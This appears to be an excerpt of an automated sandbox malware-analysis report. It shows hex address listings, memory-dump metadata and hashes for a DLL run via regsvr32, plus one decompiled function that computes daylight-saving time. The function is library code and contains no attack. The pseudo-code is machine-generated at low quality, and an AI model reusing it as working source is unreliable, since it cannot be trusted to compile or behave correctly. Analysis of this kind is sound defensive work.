                                                                              0x1004f11d
                                                                              0x1004f11f
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x00000000
                                                                              0x1004f12b
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f71b
                                                                              0x1004f71b
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x00000000
                                                                              0x1004f72f
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f21c
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f256
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f26d
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27a
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f287
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2ac
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b5
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2cd
                                                                              0x1004f2d7
                                                                              0x1004f2db
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fb
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f314
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f340
                                                                              0x1004f340
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f370
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f386
                                                                              0x1004f386
                                                                              0x1004f38b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f391
                                                                              0x1004f396
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13d
                                                                              0x1004f13f
                                                                              0x1004f141
                                                                              0x1004f141
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154
                                                                              0x1004f125
                                                                              0x1004ecdc
                                                                              0x1004ece3
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004ecaa
                                                                              0x1004ecaa
                                                                              0x1004ecaa
                                                                              0x1004ec6d
                                                                              0x1004ec6d
                                                                              0x1004ec72
                                                                              0x1004ec75
                                                                              0x1004ec7a
                                                                              0x1004ec7c
                                                                              0x1004ec81
                                                                              0x1004ec87
                                                                              0x1004f733
                                                                              0x1004f78a
                                                                              0x1004f78a

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 93c5cb663300f697106a62d286ec6e0fe277ccf12c263ef1009ecd9da3933638
                                                                              • Instruction ID: f0ad2ce86d7e33959246d4a22c244425190a566349f41c45dcc356328a033249
                                                                              • Opcode Fuzzy Hash: 93c5cb663300f697106a62d286ec6e0fe277ccf12c263ef1009ecd9da3933638
                                                                              • Instruction Fuzzy Hash: 51F1F2B761879186C760CF1AE008B6AB7A1F790794F61512AEF85C3F58DBB9D841CF08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100455E0 Relevance: .3, Instructions: 343COMMONLIBRARYCODECrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E100455E0(void* __esp, void* __eflags, signed int __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, long long __r12, long long __r13, void* _a8, long long _a16, void* _a24, long long _a32) {
				long long _v8;
				long long _v16;
				signed int _v36;
				intOrPtr _v40;
				signed int _v56;
				signed int _v64;
				signed int _v72;
				signed int _v80;
				signed int _v88;
				signed int _v96;
				signed int _v104;
				intOrPtr _t141;
				signed int _t142;
				signed int _t148;
				signed int _t169;
				intOrPtr _t172;
				intOrPtr _t173;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t201;
				unsigned int _t213;
				intOrPtr _t227;
				unsigned int _t229;
				signed int _t236;
				signed int _t237;
				unsigned int _t239;
				unsigned int _t244;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t262;
				signed int _t263;
				void* _t266;
				long long _t269;
				intOrPtr* _t272;
				long long _t274;
				signed int _t276;
				void* _t278;
				void* _t279;
				long long _t280;
				long long _t282;

				_t282 = __r13;
				_t280 = __r12;
				_t279 = __r10;
				_t278 = __r9;
				_t277 = __r8;
				_t274 = __rbp;
				_t269 = __rdi;
				_t268 = __rdx;
				_t263 = __rbx;
				_t262 = _t276;
				 *((long long*)(_t262 + 8)) = __rbx;
				 *((long long*)(_t262 + 0x18)) = __rsi;
				_t272 = __rcx;
				_t266 = _t262 - 0x28;
				 *((intOrPtr*)(_t262 - 0x28)) = 0;
				if(E10044CD0(0, __esp, _t262, _t266, __rcx) != 0) {
					r9d = 0;
					r8d = 0;
					_v104 = __rbx;
					E1003C6F0(0, __rdx, __r8);
				}
				if(_v40 != 0) {
					_a16 = _t274;
					_a32 = _t269;
					_t253 =  *(_t272 + 0x14);
					__eflags = _t253 -  *0x1006fc90; // 0xffffffff
					_v8 = _t280;
					_v16 = _t282;
					if(__eflags != 0) {
						L7:
						__eflags =  *0x10075adc; // 0x0
						if(__eflags == 0) {
							asm("cdq");
							__eflags = _t253 & 0x00000003;
							if((_t253 & 0x00000003) != 0) {
								L32:
								_t69 = _t269 + 0x76c; // 0x10000076b
								_t191 = _t69;
								_t213 = 0x51eb851f * _t191 >> 0x20 >> 7;
								__eflags = _t191 - (_t213 + (_t213 >> 0x1f)) * 0x190;
								if(_t191 == (_t213 + (_t213 >> 0x1f)) * 0x190) {
									L34:
									r10d =  *0x1006fcbc; // 0x5a
									L35:
									_t74 = _t269 - 1; // 0xfffffffe
									r8d = _t74;
									_t75 = _t269 + 0x12b; // 0x10000012a
									r10d = r10d + 1;
									r9d = 0x51eb851f * _t75 >> 0x20;
									r9d = r9d >> 7;
									r9d = r9d + (r9d >> 0x1f);
									r9d = r9d - (0x51eb851f * r8d >> 0x20 >> 5) + (0x51eb851f * r8d >> 0x20 >> 5 >> 0x1f);
									asm("cdq");
									_t86 = _t266 - 0x63db; // 0xffff9c24
									r8d = _t262 + _t86;
									r8d = r8d - (((0x92492493 * r8d >> 0x20) + r8d >> 2) + ((0x92492493 * r8d >> 0x20) + r8d >> 2 >> 0x1f)) * 7;
									__eflags = r8d;
									if(r8d > 0) {
										r10d = r10d + 7 - r8d;
										__eflags = r10d;
									} else {
										r10d = r10d - r8d;
									}
									_v56 = 0;
									_v64 = 0;
									_v72 = 0;
									_v80 = 2;
									r9d = 0xa;
									_v88 = 0;
									r8d = _t253;
									__eflags = 0;
									_v96 = 0;
									 *0x1006fc94 = r10d;
									 *0x1006fc98 = 0x6ddd00;
									 *0x1006fc90 = _t253;
									_v104 = 5;
									E100452A0(0, _t278 - 9, _t262, _t263, _t266, _t268, _t269, _t272, _t274, _t277, _t279);
									_t196 =  *0x1006fca8; // 0x0
									_t141 =  *0x1006fca4; // 0x0
									L39:
									r8d =  *0x1006fc94; // 0x0
									__eflags = r8d - _t141;
									if(r8d >= _t141) {
										_t227 =  *((intOrPtr*)(_t272 + 0x1c));
										__eflags = _t227 - _t141;
										if(_t227 < _t141) {
											L44:
											_t142 = 1;
											goto L45;
										}
										__eflags = _t227 - r8d;
										if(_t227 > r8d) {
											goto L44;
										}
										__eflags = _t227 - _t141;
										if(_t227 <= _t141) {
											L50:
											_t148 = (( *(_t272 + 8) * 0x3c +  *((intOrPtr*)(_t272 + 4))) * 0x3c +  *_t272) * 0x3e8;
											__eflags = _t227 - r8d;
											if(_t227 != r8d) {
												__eflags = _t148 - _t196;
												_t142 = 0 | _t148 - _t196 < 0x00000000;
											} else {
												__eflags = _t148 -  *0x1006fc98; // 0x0
												_t142 = 0 | __eflags >= 0x00000000;
											}
											goto L45;
										}
										__eflags = _t227 - r8d;
										if(_t227 < r8d) {
											goto L3;
										}
										goto L50;
									}
									_t227 =  *((intOrPtr*)(_t272 + 0x1c));
									__eflags = _t227 - r8d;
									if(_t227 < r8d) {
										goto L3;
									}
									__eflags = _t227 - _t141;
									if(_t227 > _t141) {
										goto L3;
									}
									__eflags = _t227 - r8d;
									if(_t227 <= r8d) {
										goto L50;
									}
									__eflags = _t227 - _t141;
									if(_t227 >= _t141) {
										goto L50;
									}
									goto L44;
								}
								r10d =  *0x1006fcf4; // 0x59
								goto L35;
							}
							_t229 = 0x51eb851f * _t253 >> 0x20 >> 5;
							__eflags = _t253 - (_t229 + (_t229 >> 0x1f)) * 0x64;
							if(_t253 != (_t229 + (_t229 >> 0x1f)) * 0x64) {
								goto L34;
							}
							goto L32;
						}
						__eflags =  *0x10075ac8; // 0x0
						if(__eflags != 0) {
							r10d =  *0x10075ad6 & 0x0000ffff;
							r11d =  *0x10075ad4 & 0x0000ffff;
							_t255 =  *0x10075ad2 & 0x0000ffff;
							r8d =  *0x10075ad0 & 0x0000ffff;
							r12d =  *0x10075ace & 0x0000ffff;
							r9d =  *0x10075aca & 0x0000ffff;
							asm("cdq");
							__eflags = _t253 & 0x00000003;
							if((_t253 & 0x00000003) != 0) {
								L12:
								_t24 = _t269 + 0x76c; // 0x10000076b
								_t197 = _t24;
								_t236 = ((0x51eb851f * _t197 >> 0x20 >> 7) + (0x51eb851f * _t197 >> 0x20 >> 7 >> 0x1f)) * 0x190;
								__eflags = _t197 - _t236;
								if(_t197 == _t236) {
									L14:
									L15:
									r8d = r8d * 0x3c;
									 *0x1006fc90 = _t253;
									r8d = r8d + _t255;
									 *0x1006fc94 = _t266 + _t280;
									r8d = r8d * 0x3c;
									r8d = r8d + r11d;
									r8d = r8d * 0x3e8;
									r8d = r8d + r10d;
									__eflags = r8d;
									 *0x1006fc98 = r8d;
									goto L16;
								}
								_t262 = r9d;
								goto L15;
							}
							_t236 = ((0x51eb851f * _t253 >> 0x20 >> 5) + (0x51eb851f * _t253 >> 0x20 >> 5 >> 0x1f)) * 0x64;
							__eflags = _t253 - _t236;
							if(_t253 != _t236) {
								goto L14;
							}
							goto L12;
						} else {
							r8d =  *0x10075ace & 0x0000ffff;
							r10d =  *0x10075ad0 & 0x0000ffff;
							r11d =  *0x10075acc & 0x0000ffff;
							r9d =  *0x10075aca & 0x0000ffff;
							_v56 =  *0x10075ad6 & 0x0000ffff;
							_v64 =  *0x10075ad4 & 0x0000ffff;
							_v72 =  *0x10075ad2 & 0x0000ffff;
							_v80 = r10d;
							_v88 = 0;
							_t236 = 1;
							_v96 = r11d;
							_v104 = r8d;
							r8d = _t253;
							E100452A0(1, 1, _t262, _t263, _t266, _t268, _t269, _t272, _t274, _t277, _t279);
							L16:
							__eflags =  *0x10075a74; // 0x0
							if(__eflags != 0) {
								_t254 =  *(_t272 + 0x14);
								r10d =  *0x10075a82 & 0x0000ffff;
								r11d =  *0x10075a80 & 0x0000ffff;
								_t256 =  *0x10075a7e & 0x0000ffff;
								r8d =  *0x10075a7c & 0x0000ffff;
								r12d =  *0x10075a7a & 0x0000ffff;
								r9d =  *0x10075a76 & 0x0000ffff;
								_v36 = 0;
								asm("cdq");
								_t237 = _t236 & 0x00000003;
								__eflags = (_t254 + _t237 & 0x00000003) - _t237;
								if((_t254 + _t237 & 0x00000003) != _t237) {
									L20:
									_t50 = _t269 + 0x76c; // 0x10000076b
									_t199 = _t50;
									_t239 = 0x51eb851f * _t199 >> 0x20 >> 7;
									__eflags = _t199 - (_t239 + (_t239 >> 0x1f)) * 0x190;
									if(_t199 == (_t239 + (_t239 >> 0x1f)) * 0x190) {
										L22:
										L23:
										r8d = r8d * 0x3c;
										r8d = r8d + _t256;
										 *0x1006fca4 = _t266 + _t280;
										r8d = r8d * 0x3c;
										r8d = r8d + r11d;
										r8d = r8d * 0x3e8;
										r8d = r8d + r10d;
										 *0x1006fca8 = r8d;
										_t169 = E10044D20(_t262, _t263,  &_v36, _t268, _t269, _t272, _t274, _t277);
										__eflags = _t169;
										if(_t169 != 0) {
											r9d = 0;
											r8d = 0;
											__eflags = 0;
											_v104 = _t263;
											E1003C6F0(0, _t268, _t277);
										}
										_t201 =  *0x1006fca8; // 0x0
										_t196 = _t201 + _v36 * 0x3e8;
										__eflags = _t196;
										 *0x1006fca8 = _t196;
										if(_t196 >= 0) {
											__eflags = _t196 - 0x5265c00;
											if(_t196 < 0x5265c00) {
												_t141 =  *0x1006fca4; // 0x0
												 *0x1006fca0 = _t254;
											} else {
												_t172 =  *0x1006fca4; // 0x0
												_t196 = _t196 - 0x5265c00;
												 *0x1006fca0 = _t254;
												_t141 = _t172 + 1;
												 *0x1006fca8 = _t196;
												 *0x1006fca4 = _t141;
											}
										} else {
											_t173 =  *0x1006fca4; // 0x0
											_t196 = _t196 + 0x5265c00;
											 *0x1006fca0 = _t254;
											_t141 = _t173 - 1;
											 *0x1006fca8 = _t196;
											 *0x1006fca4 = _t141;
										}
										goto L39;
									}
									_t262 = r9d;
									goto L23;
								}
								_t244 = 0x51eb851f * _t254 >> 0x20 >> 5;
								__eflags = _t254 - (_t244 + (_t244 >> 0x1f)) * 0x64;
								if(_t254 != (_t244 + (_t244 >> 0x1f)) * 0x64) {
									goto L22;
								}
								goto L20;
							}
							r8d =  *0x10075a7c & 0x0000ffff;
							r10d =  *0x10075a78 & 0x0000ffff;
							r11d =  *0x10075a7a & 0x0000ffff;
							r9d =  *0x10075a76 & 0x0000ffff;
							_v56 =  *0x10075a82 & 0x0000ffff;
							_v64 =  *0x10075a80 & 0x0000ffff;
							_v72 =  *0x10075a7e & 0x0000ffff;
							_v80 = r8d;
							r8d =  *(_t272 + 0x14);
							_v88 = 0;
							_v96 = r10d;
							_v104 = r11d;
							E100452A0(0, 1, _t262, _t263, _t266, _t268, _t269, _t272, _t274, _t277, _t279);
							_t196 =  *0x1006fca8; // 0x0
							_t141 =  *0x1006fca4; // 0x0
							goto L39;
						}
					}
					__eflags = _t253 -  *0x1006fca0; // 0xffffffff
					if(__eflags != 0) {
						goto L7;
					} else {
						_t196 =  *0x1006fca8; // 0x0
						_t141 =  *0x1006fca4; // 0x0
						goto L39;
					}
				} else {
					L3:
					_t142 = 0;
					L45:
					return _t142;
				}
			}















































                                                                              0x100455e0
                                                                              0x100455e0
                                                                              0x100455e0
                                                                              0x100455e0
                                                                              0x100455e0
                                                                              0x100455e0
                                                                              0x100455e0
                                                                              0x100455e0
                                                                              0x100455e0
                                                                              0x100455e0
                                                                              0x100455ea
                                                                              0x100455ee
                                                                              0x100455f2
                                                                              0x100455f5
                                                                              0x100455fb
                                                                              0x10045605
                                                                              0x10045607
                                                                              0x1004560a
                                                                              0x10045611
                                                                              0x10045616
                                                                              0x10045616
                                                                              0x1004561f
                                                                              0x10045628
                                                                              0x10045630
                                                                              0x10045638
                                                                              0x1004563b
                                                                              0x10045641
                                                                              0x10045649
                                                                              0x1004564e
                                                                              0x10045669
                                                                              0x10045669
                                                                              0x1004566f
                                                                              0x10045985
                                                                              0x1004598e
                                                                              0x10045990
                                                                              0x100459aa
                                                                              0x100459aa
                                                                              0x100459aa
                                                                              0x100459b7
                                                                              0x100459c7
                                                                              0x100459c9
                                                                              0x100459d4
                                                                              0x100459d4
                                                                              0x100459db
                                                                              0x100459db
                                                                              0x100459db
                                                                              0x100459df
                                                                              0x100459ea
                                                                              0x100459f0
                                                                              0x100459f3
                                                                              0x100459fd
                                                                              0x10045a15
                                                                              0x10045a18
                                                                              0x10045a30
                                                                              0x10045a30
                                                                              0x10045a50
                                                                              0x10045a53
                                                                              0x10045a56
                                                                              0x10045a65
                                                                              0x10045a65
                                                                              0x10045a58
                                                                              0x10045a58
                                                                              0x10045a58
                                                                              0x10045a68
                                                                              0x10045a6c
                                                                              0x10045a70
                                                                              0x10045a74
                                                                              0x10045a7c
                                                                              0x10045a82
                                                                              0x10045a8a
                                                                              0x10045a8d
                                                                              0x10045a8f
                                                                              0x10045a93
                                                                              0x10045a9a
                                                                              0x10045aa4
                                                                              0x10045aaa
                                                                              0x10045ab2
                                                                              0x10045ab7
                                                                              0x10045abd
                                                                              0x10045ac3
                                                                              0x10045ac3
                                                                              0x10045ad7
                                                                              0x10045aea
                                                                              0x10045b26
                                                                              0x10045b29
                                                                              0x10045b2b
                                                                              0x10045b09
                                                                              0x10045b09
                                                                              0x00000000
                                                                              0x10045b09
                                                                              0x10045b2d
                                                                              0x10045b30
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10045b32
                                                                              0x10045b34
                                                                              0x10045b3f
                                                                              0x10045b4d
                                                                              0x10045b53
                                                                              0x10045b56
                                                                              0x10045b65
                                                                              0x10045b6a
                                                                              0x10045b58
                                                                              0x10045b58
                                                                              0x10045b61
                                                                              0x10045b61
                                                                              0x00000000
                                                                              0x10045b56
                                                                              0x10045b36
                                                                              0x10045b39
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10045b39
                                                                              0x10045aec
                                                                              0x10045aef
                                                                              0x10045af2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10045af8
                                                                              0x10045afa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10045b00
                                                                              0x10045b03
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10045b05
                                                                              0x10045b07
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10045b07
                                                                              0x100459cb
                                                                              0x00000000
                                                                              0x100459cb
                                                                              0x10045999
                                                                              0x100459a6
                                                                              0x100459a8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100459a8
                                                                              0x10045675
                                                                              0x10045683
                                                                              0x100456ed
                                                                              0x100456f5
                                                                              0x100456fd
                                                                              0x10045704
                                                                              0x1004570c
                                                                              0x10045714
                                                                              0x1004571e
                                                                              0x10045727
                                                                              0x10045729
                                                                              0x10045743
                                                                              0x10045743
                                                                              0x10045743
                                                                              0x1004575a
                                                                              0x10045760
                                                                              0x10045762
                                                                              0x10045771
                                                                              0x10045779
                                                                              0x10045779
                                                                              0x10045781
                                                                              0x10045787
                                                                              0x1004578a
                                                                              0x10045790
                                                                              0x10045794
                                                                              0x10045797
                                                                              0x1004579e
                                                                              0x1004579e
                                                                              0x100457a1
                                                                              0x00000000
                                                                              0x100457a1
                                                                              0x10045764
                                                                              0x00000000
                                                                              0x10045767
                                                                              0x1004573c
                                                                              0x1004573f
                                                                              0x10045741
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10045685
                                                                              0x10045693
                                                                              0x100456a2
                                                                              0x100456aa
                                                                              0x100456b2
                                                                              0x100456ba
                                                                              0x100456be
                                                                              0x100456c2
                                                                              0x100456c6
                                                                              0x100456cb
                                                                              0x100456cf
                                                                              0x100456d4
                                                                              0x100456d9
                                                                              0x100456de
                                                                              0x100456e3
                                                                              0x100457a8
                                                                              0x100457a8
                                                                              0x100457af
                                                                              0x10045826
                                                                              0x10045829
                                                                              0x10045831
                                                                              0x10045839
                                                                              0x10045840
                                                                              0x10045848
                                                                              0x10045850
                                                                              0x1004585a
                                                                              0x1004585e
                                                                              0x1004585f
                                                                              0x10045867
                                                                              0x10045869
                                                                              0x10045883
                                                                              0x10045883
                                                                              0x10045883
                                                                              0x10045890
                                                                              0x100458a0
                                                                              0x100458a2
                                                                              0x100458b1
                                                                              0x100458b9
                                                                              0x100458b9
                                                                              0x100458c6
                                                                              0x100458c9
                                                                              0x100458cf
                                                                              0x100458d3
                                                                              0x100458d6
                                                                              0x100458dd
                                                                              0x100458e0
                                                                              0x100458e7
                                                                              0x100458ec
                                                                              0x100458ee
                                                                              0x100458f0
                                                                              0x100458f3
                                                                              0x100458f8
                                                                              0x100458fa
                                                                              0x100458ff
                                                                              0x100458ff
                                                                              0x10045904
                                                                              0x10045914
                                                                              0x10045914
                                                                              0x10045916
                                                                              0x1004591c
                                                                              0x10045944
                                                                              0x1004594a
                                                                              0x10045972
                                                                              0x10045978
                                                                              0x1004594c
